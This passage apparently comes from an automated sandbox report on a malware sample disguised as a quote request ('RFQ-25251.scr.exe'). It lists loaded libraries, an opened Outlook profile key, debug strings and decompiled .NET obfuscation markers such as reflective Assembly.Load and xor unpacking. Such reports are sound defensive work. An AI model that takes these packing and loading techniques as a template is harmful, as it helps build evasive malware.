                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: RFQ-25251.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: RFQ-25251.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: RFQ-25251.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: replace.pdb source: RFQ-25251.scr.exe, 00000007.00000002.1574095588.0000000000D07000.00000004.00000020.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 0000000E.00000003.1512954292.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 0000000E.00000002.3730835081.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: replace.pdbGCTL source: RFQ-25251.scr.exe, 00000007.00000002.1574095588.0000000000D07000.00000004.00000020.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 0000000E.00000003.1512954292.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 0000000E.00000002.3730835081.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ZkvvIsytMpWTrpZoKvbY.exe, 0000000E.00000002.3734045168.000000000100E000.00000002.00000001.01000000.0000000D.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000000.1642862154.000000000100E000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: YviV.pdb source: RFQ-25251.scr.exe
                Source: Binary string: wntdll.pdbUGP source: RFQ-25251.scr.exe, 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 0000000F.00000003.1575889614.0000000002C94000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 0000000F.00000003.1573807130.0000000002AE8000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RFQ-25251.scr.exe, RFQ-25251.scr.exe, 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 0000000F.00000003.1575889614.0000000002C94000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 0000000F.00000003.1573807130.0000000002AE8000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: YviV.pdbSHA256 source: RFQ-25251.scr.exe

                Data Obfuscation

                barindex
                .NET source code contains method to dynamically call methods (often used by packers)
                Source: 0.2.RFQ-25251.scr.exe.78d0000.6.raw.unpack, XG.cs.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
                Source: 0.2.RFQ-25251.scr.exe.32221b4.0.raw.unpack, XG.cs.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
                .NET source code contains potential unpacker
                Source: RFQ-25251.scr.exe, frmShoppingBasket.cs.Net Code: InitializeComponent contains xor as well as GetObject
                Source: 0.2.RFQ-25251.scr.exe.4584948.3.raw.unpack, pKSsmDJgkrJrZbpmoM.cs.Net Code: Q8SsjeIS9n System.Reflection.Assembly.Load(byte[])
                Source: 0.2.RFQ-25251.scr.exe.4608768.1.raw.unpack, pKSsmDJgkrJrZbpmoM.cs.Net Code: Q8SsjeIS9n System.Reflection.Assembly.Load(byte[])
                Source: 0.2.RFQ-25251.scr.exe.7860000.4.raw.unpack, -.cs.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.RFQ-25251.scr.exe.4201390.2.raw.unpack, -.cs.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.RFQ-25251.scr.exe.8440000.7.raw.unpack, pKSsmDJgkrJrZbpmoM.cs.Net Code: Q8SsjeIS9n System.Reflection.Assembly.Load(byte[])
                Source: 15.2.replace.exe.346cd08.2.raw.unpack, frmShoppingBasket.cs.Net Code: InitializeComponent contains xor as well as GetObject
                Source: 16.0.ZkvvIsytMpWTrpZoKvbY.exe.2c4cd08.1.raw.unpack, frmShoppingBasket.cs.Net Code: InitializeComponent contains xor as well as GetObject
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 0_2_0810AB28 push eax; retf 0_2_0810AB29
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0041E073 push ebx; ret 7_2_0041E074
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_00416023 push ds; ret 7_2_00416071
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_00404834 push ebx; ret 7_2_00404835
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_004119A0 pushfd ; iretd 7_2_004119B2
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0040D276 push ebx; retf 7_2_0040D29A
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0040D214 push ecx; iretd 7_2_0040D215
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_00418B17 push ss; retf 7_2_00418B1B
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_004074E7 pushad ; iretd 7_2_004074F3
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_00403490 push eax; ret 7_2_00403492
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0041E4A3 push edx; ret 7_2_0041E4A4
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_00406524 push es; iretd 7_2_00406530
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_004145D8 pushfd ; ret 7_2_004145D9
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0040CE54 push cs; iretd 7_2_0040CE5B
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0124225F pushad ; ret 7_2_012427F9
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012427FA pushad ; ret 7_2_012427F9
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012709AD push ecx; mov dword ptr [esp], ecx7_2_012709B6
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0124283D push eax; iretd 7_2_01242858
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E4225F pushad ; ret 15_2_02E427F9
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E427FA pushad ; ret 15_2_02E427F9
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E4283D push eax; iretd 15_2_02E42858
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E709AD push ecx; mov dword ptr [esp], ecx15_2_02E709B6
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_004A4054 pushad ; iretd 15_2_004A4060
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_004B231D push edi; retf 15_2_004B2328
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_004AE50D pushfd ; iretd 15_2_004AE51F
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_004BABE0 push ebx; ret 15_2_004BABE1
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_004B2B90 push ds; ret 15_2_004B2BDE
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_004BB010 push edx; ret 15_2_004BB011
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_004A3091 push es; iretd 15_2_004A309D
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_004B1145 pushfd ; ret 15_2_004B1146
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_004A13A1 push ebx; ret 15_2_004A13A2
                Source: RFQ-25251.scr.exeStatic PE information: section name: .text entropy: 7.982871137085219
                Source: 0.2.RFQ-25251.scr.exe.78d0000.6.raw.unpack, XG.csHigh entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
                Source: 0.2.RFQ-25251.scr.exe.4584948.3.raw.unpack, bnsKX38XO5yTMqX9Eh.csHigh entropy of concatenated method names: 'CokpAabYbu', 'Fp0pqNXfx3', 'YBkpsM7Hae', 'duAp0360cZ', 'cfdpGNv6cG', 'LtGpWT5qL6', 'svWp4116eJ', 'MNva97Up8U', 'ENDaT5tbmt', 'Px0awW2ALu'
                Source: 0.2.RFQ-25251.scr.exe.4584948.3.raw.unpack, NHpkdm5klk79ypEQio.csHigh entropy of concatenated method names: 'UiXLYP3eOwfThvLC7Za', 'mOZDLh3wN2EGCcygQ1c', 'ot54aC5Bax', 'QP14pVGOiE', 'q9e4uXZYhH', 'R5AFYD3jaBCWkwfmfZD', 'ywd6tr3goy3vL4UOSpb'
                Source: 0.2.RFQ-25251.scr.exe.4584948.3.raw.unpack, plXxJ2sElAJaA6eJpb.csHigh entropy of concatenated method names: 'qYOAt1VJJp', 'nKUAJ3pAW3', 'M55AYW98K8', 'TaJArtUCwF', 'yUEA3f21Ce', 'lE6AZvfN9Q', 'xfkCOnYs3EFcpu2aoU', 'sRXNBCuD3FxAkDf3Im', 'U0kAAgfKOJ', 'BUAAq2Bwev'
                Source: 0.2.RFQ-25251.scr.exe.4584948.3.raw.unpack, fAf9PIo55W98K8kaJt.csHigh entropy of concatenated method names: 'xBhyBw98MP', 'Y2WyLpT3Uo', 'NcUybExfsn', 'vQtyo1OvV4', 'vT5y3oMCsV', 'jtGyZswFHX', 'aNfyDENE7i', 'Pmqyan7FAZ', 'xrEyprWmAM', 'heEyuZ7Nj9'
                Source: 0.2.RFQ-25251.scr.exe.4584948.3.raw.unpack, wCevE6NvfN9Qyv7Vp0.csHigh entropy of concatenated method names: 'XXS4hdIfaf', 'FS64GIeKtK', 'hUk4WoJSFf', 'JXj4ti2Igs', 'jCO4JITZRW', 'wrgWPtWjN6', 'Fd1WO1j48b', 'sDsW94W5bl', 'dGdWTEuPki', 'N7TWwtftt3'
                Source: 0.2.RFQ-25251.scr.exe.4584948.3.raw.unpack, pKSsmDJgkrJrZbpmoM.csHigh entropy of concatenated method names: 'cjcqhxGI4H', 'l0fq0i6agg', 'kuPqGPpgpp', 'jYZqyy2EO1', 'WqTqWfNdUZ', 'jkOq4IiZCm', 'anOqtpu5x0', 'VUMqJTFOW7', 'TUBqvu4g9W', 'zMqqYeHkE0'
                Source: 0.2.RFQ-25251.scr.exe.4584948.3.raw.unpack, V1VJJpbrKU3pAW3f5X.csHigh entropy of concatenated method names: 'RexGnqMN9j', 'QvWGdOW7WU', 'xPjGkn0tlF', 'CVuGXHiHtR', 'iCDGPJle0b', 'XgoGOIn3AO', 'Ba8G9fS1rc', 'SjHGTGJue9', 'xROGwp1dSp', 'GnCG8m8NKX'
                Source: 0.2.RFQ-25251.scr.exe.4584948.3.raw.unpack, CIHaFMT4fys0T10tOK.csHigh entropy of concatenated method names: 'zZMa0xDvkk', 'ChSaG2f9BO', 'OIVaygmpvB', 'f7KaWkx6J5', 'KKba4xCdB7', 'd8ratHFFFl', 'aMwaJOIWud', 'lZLavikvMo', 'vTWaY0sNI7', 'frKarq82wv'
                Source: 0.2.RFQ-25251.scr.exe.4584948.3.raw.unpack, N3HOjAzv4Y24unPTPm.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'RwLpctThQA', 'Orfp3BEIWC', 'lqnpZprLDg', 'vyepDFTw3X', 't2SpaWNhYc', 'XafppgIsPV', 'ea1puUgqrr'
                Source: 0.2.RFQ-25251.scr.exe.4584948.3.raw.unpack, BQQbrtEekkfXprmlLC.csHigh entropy of concatenated method names: 'jpttSjq48j', 'VestxdaTPw', 'kaBtje8DIE', 'W7etB5ELDI', 'I94tURYMVw', 'ULctLiPlnf', 'wBitelENvD', 'd8ntbnV0jC', 'A8YtonM1DL', 'urHtR8v1EN'
                Source: 0.2.RFQ-25251.scr.exe.4584948.3.raw.unpack, nLZRW1w4VspG60PnR1.csHigh entropy of concatenated method names: 'FqmaNdcqne', 'n1Ea51fBET', 'u9JaMKQOHH', 'cgjaFH1hio', 'OuPanGbFJA', 'djFamiyvMC', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.RFQ-25251.scr.exe.4584948.3.raw.unpack, NSLw3EVUxbmq1Zwdl0.csHigh entropy of concatenated method names: 'rebjG3yGo', 'A7EBC92FF', 'eJoL4meb3', 'TnxeHrxXC', 'V1PopnDli', 'VkkRbslBk', 'JKRgpsTxwQA6cmJJef', 'feGyOem1dvjwl7Y6fr', 'pA2aGaarZ', 'WbUudsrah'
                Source: 0.2.RFQ-25251.scr.exe.4584948.3.raw.unpack, BCwFYJRAa1J2kxUEf2.csHigh entropy of concatenated method names: 'GVsWU6Dm6X', 'TE5WedCGCn', 'nDmyMsQNnU', 'wTRyFEJgnM', 'Y0iymWFNCg', 'qiNy79qhOe', 'Y66yfNJXNg', 'c0XyIRBk8h', 'm1ByEGOH03', 'ilhylgyq2K'
                Source: 0.2.RFQ-25251.scr.exe.4584948.3.raw.unpack, EQVqthkdaOMYTCtvpo.csHigh entropy of concatenated method names: 'ToString', 'pA2Z2XW54P', 'vC9Z527vK8', 'toCZM2qES1', 'l5LZFdwdKy', 'wsvZmdFJY9', 'jxLZ7J9VQU', 'JReZfn5KBy', 'r61ZI9oVNM', 'yyLZEwHA1E'
                Source: 0.2.RFQ-25251.scr.exe.4584948.3.raw.unpack, PkcfVdC3fyvLif2oJX.csHigh entropy of concatenated method names: 'kVlcbabglr', 'aFCcog9Ah7', 'EOFcNPnYXA', 'qvrc5keb1u', 'QsucFUGEqR', 'qTVcmLO6CI', 'Adscfttdh7', 'tc4cIQ4Wy3', 'CDEclibZ8K', 's4Ec2P9dSf'
                Source: 0.2.RFQ-25251.scr.exe.4584948.3.raw.unpack, WTaIdYAHtQIKjWJVo1U.csHigh entropy of concatenated method names: 'NYxpSXV454', 'gRtpxj338Y', 'NXipjHZLmB', 'cngpBreqm8', 'xyEpUXm7nl', 'oBTpL3twsq', 'yNWpeMpyRe', 'rpBpbUguHq', 'UGnpoN2dYx', 'bO2pRDhDu3'
                Source: 0.2.RFQ-25251.scr.exe.4584948.3.raw.unpack, mJEmRcAql8VjR5VPgd7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nSWun2APyf', 'TUqud4MbAm', 'TpsukCmf90', 'CY1uXOEmAL', 'miPuP4vUJm', 'DYeuOsfXYY', 'iaqu9JGsM1'
                Source: 0.2.RFQ-25251.scr.exe.4584948.3.raw.unpack, sXwvgYAAZbQ3JsUWG7n.csHigh entropy of concatenated method names: 'ToString', 'YFcuqsYWFq', 'QTPusa9BSA', 'iFVuhakJAJ', 'iUZu01RbRA', 'df2uGtBXoe', 'trEuyhDGvJ', 'xknuWmUrHD', 'EXdnQb4qyAviXWSruPF', 'CknueE4iyvR7ThIUTRP'
                Source: 0.2.RFQ-25251.scr.exe.4584948.3.raw.unpack, VSTeZLAVPy2vMPTh2O0.csHigh entropy of concatenated method names: 'hexuSfCCAi', 'ep6uxaSpDP', 'U3eujj9knB', 'LXTT57X46CyOlDTm02t', 'm7j8f1X3y9AsgmJAOF1', 'kuD2GNXCGRRmaknHejU', 'K7TN3jXX9lNSGT3umSl', 'wqhfKoXvnWkhSuQRUBB', 'pZCwYKXkVdSQGboN9FF'
                Source: 0.2.RFQ-25251.scr.exe.4584948.3.raw.unpack, terwpcnhoJtEwkSOIS.csHigh entropy of concatenated method names: 'G5k3lATU7y', 'XO53Qu32nO', 'sqE3n2xqS5', 'Rxq3dd6vIm', 'VEK35DHegR', 'mvc3MKqV0i', 'S7i3FZot4c', 'KXB3mhoqaY', 'fqp37AZe4e', 'uTG3fmjivU'
                Source: 0.2.RFQ-25251.scr.exe.4584948.3.raw.unpack, KQ5xhVGrSnEGR8Ft4u.csHigh entropy of concatenated method names: 'Dispose', 'mGXAwmrCSs', 'ltMV5FcCu0', 'rD6554vJC8', 'DLIA8HaFM4', 'LysAz0T10t', 'ProcessDialogKey', 'VKcVHLZRW1', 'iVsVApG60P', 'RR1VVAnsKX'
                Source: 0.2.RFQ-25251.scr.exe.4584948.3.raw.unpack, BjdM72fL7Hv2eOOnZp.csHigh entropy of concatenated method names: 'Uabt0pnGdw', 'sJXtyk4wnm', 'vS1t4WPpTh', 'NBH48A9sYM', 'kY24zdLKtY', 'hwYtHf8ics', 'NYdtACnPfh', 'TcutVgtRKj', 'ta6tqU9ytJ', 'C4JtsX9pfU'
                Source: 0.2.RFQ-25251.scr.exe.4608768.1.raw.unpack, bnsKX38XO5yTMqX9Eh.csHigh entropy of concatenated method names: 'CokpAabYbu', 'Fp0pqNXfx3', 'YBkpsM7Hae', 'duAp0360cZ', 'cfdpGNv6cG', 'LtGpWT5qL6', 'svWp4116eJ', 'MNva97Up8U', 'ENDaT5tbmt', 'Px0awW2ALu'
                Source: 0.2.RFQ-25251.scr.exe.4608768.1.raw.unpack, NHpkdm5klk79ypEQio.csHigh entropy of concatenated method names: 'UiXLYP3eOwfThvLC7Za', 'mOZDLh3wN2EGCcygQ1c', 'ot54aC5Bax', 'QP14pVGOiE', 'q9e4uXZYhH', 'R5AFYD3jaBCWkwfmfZD', 'ywd6tr3goy3vL4UOSpb'
                Source: 0.2.RFQ-25251.scr.exe.4608768.1.raw.unpack, plXxJ2sElAJaA6eJpb.csHigh entropy of concatenated method names: 'qYOAt1VJJp', 'nKUAJ3pAW3', 'M55AYW98K8', 'TaJArtUCwF', 'yUEA3f21Ce', 'lE6AZvfN9Q', 'xfkCOnYs3EFcpu2aoU', 'sRXNBCuD3FxAkDf3Im', 'U0kAAgfKOJ', 'BUAAq2Bwev'
                Source: 0.2.RFQ-25251.scr.exe.4608768.1.raw.unpack, fAf9PIo55W98K8kaJt.csHigh entropy of concatenated method names: 'xBhyBw98MP', 'Y2WyLpT3Uo', 'NcUybExfsn', 'vQtyo1OvV4', 'vT5y3oMCsV', 'jtGyZswFHX', 'aNfyDENE7i', 'Pmqyan7FAZ', 'xrEyprWmAM', 'heEyuZ7Nj9'
                Source: 0.2.RFQ-25251.scr.exe.4608768.1.raw.unpack, wCevE6NvfN9Qyv7Vp0.csHigh entropy of concatenated method names: 'XXS4hdIfaf', 'FS64GIeKtK', 'hUk4WoJSFf', 'JXj4ti2Igs', 'jCO4JITZRW', 'wrgWPtWjN6', 'Fd1WO1j48b', 'sDsW94W5bl', 'dGdWTEuPki', 'N7TWwtftt3'
                Source: 0.2.RFQ-25251.scr.exe.4608768.1.raw.unpack, pKSsmDJgkrJrZbpmoM.csHigh entropy of concatenated method names: 'cjcqhxGI4H', 'l0fq0i6agg', 'kuPqGPpgpp', 'jYZqyy2EO1', 'WqTqWfNdUZ', 'jkOq4IiZCm', 'anOqtpu5x0', 'VUMqJTFOW7', 'TUBqvu4g9W', 'zMqqYeHkE0'
                Source: 0.2.RFQ-25251.scr.exe.4608768.1.raw.unpack, V1VJJpbrKU3pAW3f5X.csHigh entropy of concatenated method names: 'RexGnqMN9j', 'QvWGdOW7WU', 'xPjGkn0tlF', 'CVuGXHiHtR', 'iCDGPJle0b', 'XgoGOIn3AO', 'Ba8G9fS1rc', 'SjHGTGJue9', 'xROGwp1dSp', 'GnCG8m8NKX'
                Source: 0.2.RFQ-25251.scr.exe.4608768.1.raw.unpack, CIHaFMT4fys0T10tOK.csHigh entropy of concatenated method names: 'zZMa0xDvkk', 'ChSaG2f9BO', 'OIVaygmpvB', 'f7KaWkx6J5', 'KKba4xCdB7', 'd8ratHFFFl', 'aMwaJOIWud', 'lZLavikvMo', 'vTWaY0sNI7', 'frKarq82wv'
                Source: 0.2.RFQ-25251.scr.exe.4608768.1.raw.unpack, N3HOjAzv4Y24unPTPm.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'RwLpctThQA', 'Orfp3BEIWC', 'lqnpZprLDg', 'vyepDFTw3X', 't2SpaWNhYc', 'XafppgIsPV', 'ea1puUgqrr'
                Source: 0.2.RFQ-25251.scr.exe.4608768.1.raw.unpack, BQQbrtEekkfXprmlLC.csHigh entropy of concatenated method names: 'jpttSjq48j', 'VestxdaTPw', 'kaBtje8DIE', 'W7etB5ELDI', 'I94tURYMVw', 'ULctLiPlnf', 'wBitelENvD', 'd8ntbnV0jC', 'A8YtonM1DL', 'urHtR8v1EN'
                Source: 0.2.RFQ-25251.scr.exe.4608768.1.raw.unpack, nLZRW1w4VspG60PnR1.csHigh entropy of concatenated method names: 'FqmaNdcqne', 'n1Ea51fBET', 'u9JaMKQOHH', 'cgjaFH1hio', 'OuPanGbFJA', 'djFamiyvMC', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.RFQ-25251.scr.exe.4608768.1.raw.unpack, NSLw3EVUxbmq1Zwdl0.csHigh entropy of concatenated method names: 'rebjG3yGo', 'A7EBC92FF', 'eJoL4meb3', 'TnxeHrxXC', 'V1PopnDli', 'VkkRbslBk', 'JKRgpsTxwQA6cmJJef', 'feGyOem1dvjwl7Y6fr', 'pA2aGaarZ', 'WbUudsrah'
                Source: 0.2.RFQ-25251.scr.exe.4608768.1.raw.unpack, BCwFYJRAa1J2kxUEf2.csHigh entropy of concatenated method names: 'GVsWU6Dm6X', 'TE5WedCGCn', 'nDmyMsQNnU', 'wTRyFEJgnM', 'Y0iymWFNCg', 'qiNy79qhOe', 'Y66yfNJXNg', 'c0XyIRBk8h', 'm1ByEGOH03', 'ilhylgyq2K'
                Source: 0.2.RFQ-25251.scr.exe.4608768.1.raw.unpack, EQVqthkdaOMYTCtvpo.csHigh entropy of concatenated method names: 'ToString', 'pA2Z2XW54P', 'vC9Z527vK8', 'toCZM2qES1', 'l5LZFdwdKy', 'wsvZmdFJY9', 'jxLZ7J9VQU', 'JReZfn5KBy', 'r61ZI9oVNM', 'yyLZEwHA1E'
                Source: 0.2.RFQ-25251.scr.exe.4608768.1.raw.unpack, PkcfVdC3fyvLif2oJX.csHigh entropy of concatenated method names: 'kVlcbabglr', 'aFCcog9Ah7', 'EOFcNPnYXA', 'qvrc5keb1u', 'QsucFUGEqR', 'qTVcmLO6CI', 'Adscfttdh7', 'tc4cIQ4Wy3', 'CDEclibZ8K', 's4Ec2P9dSf'
                Source: 0.2.RFQ-25251.scr.exe.4608768.1.raw.unpack, WTaIdYAHtQIKjWJVo1U.csHigh entropy of concatenated method names: 'NYxpSXV454', 'gRtpxj338Y', 'NXipjHZLmB', 'cngpBreqm8', 'xyEpUXm7nl', 'oBTpL3twsq', 'yNWpeMpyRe', 'rpBpbUguHq', 'UGnpoN2dYx', 'bO2pRDhDu3'
                Source: 0.2.RFQ-25251.scr.exe.4608768.1.raw.unpack, mJEmRcAql8VjR5VPgd7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nSWun2APyf', 'TUqud4MbAm', 'TpsukCmf90', 'CY1uXOEmAL', 'miPuP4vUJm', 'DYeuOsfXYY', 'iaqu9JGsM1'
                Source: 0.2.RFQ-25251.scr.exe.4608768.1.raw.unpack, sXwvgYAAZbQ3JsUWG7n.csHigh entropy of concatenated method names: 'ToString', 'YFcuqsYWFq', 'QTPusa9BSA', 'iFVuhakJAJ', 'iUZu01RbRA', 'df2uGtBXoe', 'trEuyhDGvJ', 'xknuWmUrHD', 'EXdnQb4qyAviXWSruPF', 'CknueE4iyvR7ThIUTRP'
                Source: 0.2.RFQ-25251.scr.exe.4608768.1.raw.unpack, VSTeZLAVPy2vMPTh2O0.csHigh entropy of concatenated method names: 'hexuSfCCAi', 'ep6uxaSpDP', 'U3eujj9knB', 'LXTT57X46CyOlDTm02t', 'm7j8f1X3y9AsgmJAOF1', 'kuD2GNXCGRRmaknHejU', 'K7TN3jXX9lNSGT3umSl', 'wqhfKoXvnWkhSuQRUBB', 'pZCwYKXkVdSQGboN9FF'
